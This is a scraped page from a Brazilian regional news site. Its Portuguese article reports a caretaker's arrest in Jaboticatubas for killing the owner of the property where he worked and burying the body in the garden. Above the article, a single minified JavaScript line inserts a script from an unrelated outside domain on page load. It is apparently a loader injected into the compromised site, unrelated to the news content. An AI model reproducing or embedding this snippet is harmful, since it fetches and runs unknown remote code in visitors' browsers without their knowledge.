;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Caseiro é preso por matar dono de sítio e enterrar corpo no jardim, na Grande BH. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Caseiro é preso por matar dono de sítio e enterrar corpo no jardim, na Grande BH.

Foto: Polícia Civil / Divulgação

Vítima estava desaparecida desde meados de dezembro, até que o caseiro procurou a polícia para confessar o crime e indicar o local onde estava o cadáver

Equipes do Corpo de Bombeiros encontraram o corpo enterrado no jardim do sítio em Jaboticatubas —

Um caseiro, de 35 anos, foi preso nesta quarta-feira (8) em Jaboticatubas, região metropolitana de Belo Horizonte. Conforme a Polícia Civil, ele confessou que matou o proprietário do sítio onde trabalhava e escondeu o corpo no jardim.

As investigações iniciaram após o desaparecimento da vítima, de 37 anos, ser reportado às autoridades pelo esposo, em 11 de dezembro. No último 1º de fevereiro, o caseiro procurou a delegacia e confessou o crime.

Acionadas, equipes do Corpo de Bombeiro encontraram o cadáver da vítima. Em seguida, o corpo foi levado ao Instituto Médico-Legal (IML) Dr. André Roquette, em Belo Horizonte, onde passou por exames e foi liberado.

 

Questionado sobre a motivação do crime, o caseiro disse que disparou quatro vezes em legítima defesa e que a vítima era usuária de drogas. Os policiais, no entanto, identificaram contradições no interrogatório. Ele foi encaminhado ao sistema prisional, onde está à disposição da Justiça.

O caso segue em investigação pela Polícia Civil para determinar a motivação e a dinâmica do assassinato.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.